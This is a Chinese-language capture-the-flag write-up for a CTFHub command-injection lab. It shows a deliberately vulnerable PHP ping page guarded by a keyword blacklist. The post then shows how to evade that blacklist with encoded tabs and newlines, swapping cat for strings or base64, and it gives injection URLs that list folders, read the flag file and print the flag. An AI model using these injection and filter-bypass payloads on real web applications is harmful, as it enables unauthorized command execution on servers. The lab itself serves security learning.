首页 > 其他分享 >CTFHUB-综合过滤练习

CTFHUB-综合过滤练习

时间:2024-01-22 18:11:38浏览次数:27  
标签:文件 查看 CTFHUB ip 练习 过滤 09f

前言

靶场地址:www.ctfhub.com

综合过滤练习

image

点击查看代码
<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

从题目中我们可以看到过滤了目录穿越符 </> 以及空格管道符 cat等
空格--%09
管道符--%0a
目录穿越符--..
cat--strings

先查看当前目录下文件
image

有一个flag文件夹,进入该文件夹查看文件
?ip=127.0.0.1%0Acd%09f***_is_here%0Als#
查看flag文件
image

base64读取文件
?ip=127.0.0.1%0Acd%09f***_is_here%0Abase64%09f***_163003222515414.php#

image

base64解码
image

ctfhub{90f56e1d5b3f637691802eaa}

image

标签:文件,查看,CTFHUB,ip,练习,过滤,09f
From: https://www.cnblogs.com/zy4024/p/17980672/CTFHUB_rce

相关文章

  • PA0:关于剩余练习3
    42、44: 1/19 栈和队列栈的特点:先入先出,后入后出。出口也是入口,另一端封闭。 队列:一头入,另一头出(非传统队列也有一端可出入,另一端出的设计)、这个练习的要求说实话有点奇怪,不准写.c,只写.h头文件来满足单元测试,看具体的要求,它要求基于之前的list来实现栈和队列,但是又不让用.......
  • CVE-2018-19518复现练习
    概述漏洞概述:imap_open函数在传递邮箱名给ssh之前没有正确过滤接收的参数,导致攻击者可以利用-oProxyCommand参数向IMAP服务器发起命令执行恶意代码影响版本:Ubuntu、Debian、RedHat、SUSE环境搭建cd/CVE-2018-19518docker-composeup-d查看网站的组件直接看页面也没有什么......
  • 推荐系统-协同过滤
    前言今天继续读论文,今天读的文章是一篇1997年发表于CommunicationsoftheACM上的论文,名叫推荐系统(Recommendersystems),全文及翻译ITISOFTENNECESSARYTOMAKECHOICESWITHOUTSUFFICIENTpersonalexperienceofthealternatives.Ineverydaylife,werelyonreco......
  • 第一章练习1-9
    1.解释为什么程序1-7的交换函数没有把形参x和y所对应的实参的值交换。如何修改代码,使实参的值得到交换?程序1-7交换两个整数的不正确的代码voidswap(intx,inty){//交换整数x和yinttemp=x;x=y;y=temp;}调用swap函数是将实参的值复制一份给x和y,本质是交换......
  • 蓝桥杯准备---练习日志
    2024-01-17利用Cubemx配置usart中Asyn...和Syn....的意思是什么? 使用串口时报错如下------解决办法:添加st官方提供的串口驱动文件 修改底层printf内部的fputs代码---实现printf函数通过串口输出,需要利用LIB什么的......我猜测这个函数是向某个文件流中写......
  • Java如何过滤掉一段字符串中出现重复的字母或数字?
    可以使用Java中的HashSet来去除一段字符串中出现重复的字母或数字。HashSet是一个不允许有重复元素的集合,因此可以利用它的特性来去除重复的字符或数字。示例代码如下:importjava.util.HashSet;publicclassRemoveDuplicates{publicstaticvoidmain(String[]args){......
  • 前端学习-简单项目练习01-小兔鲜
    一些笔记使用flex-wrap换行(一行一个元素)ul{display:flex;flex-wrap:wrap;}ulli{flex:100%;}html中让img撑满整个divdiv要设置宽高,img也要有宽高且均为100%,最重要的是img要给display:block。<divid="mainDiv"style="width:100%;height:100%">......
  • springboot项目结合filter,jdk代理实现敏感词过滤(简单版)
    我们对getParameter()这个方法得到的参数进行敏感词过滤。实现思路:利用过滤器拦截所有的路径请求同时在在过滤器执行的时候对getParameter得到的value值进行过滤。最后呢,到我们自己的实现的逻辑中呢?这个value值就被我们做过处理了。1:自定义的过滤配置文件把文件位置放在resource下的......
  • 贪心算法练习
    问题描述:设有n个正整数,将他们连接成一排,组成一个最大的多位整数。例如:n=4时,4个整数21,8,901,6连成的最大整数为:9018621。贪心选择策略:(1)将所有数字转化为字符串形式。(2)将所有字符串按照长度从大到小排序。如果长度相同,则按照字典序从大到小排序。(3)将排序后的字符......
  • 图论练习笔记
    P1606[USACO07FEB]LilypadPondG首先跳的过程肯定不会经过相同位置,所以之前经过的位置可以视为原状态,所以可以把添加的莲花数量视为当前路径长度,问题也就转化成了最短路计数。因为求的是添加莲花的方案数而不是经过路径的方案数,所以可以把已有的莲花连通块缩起来,以水格子为状......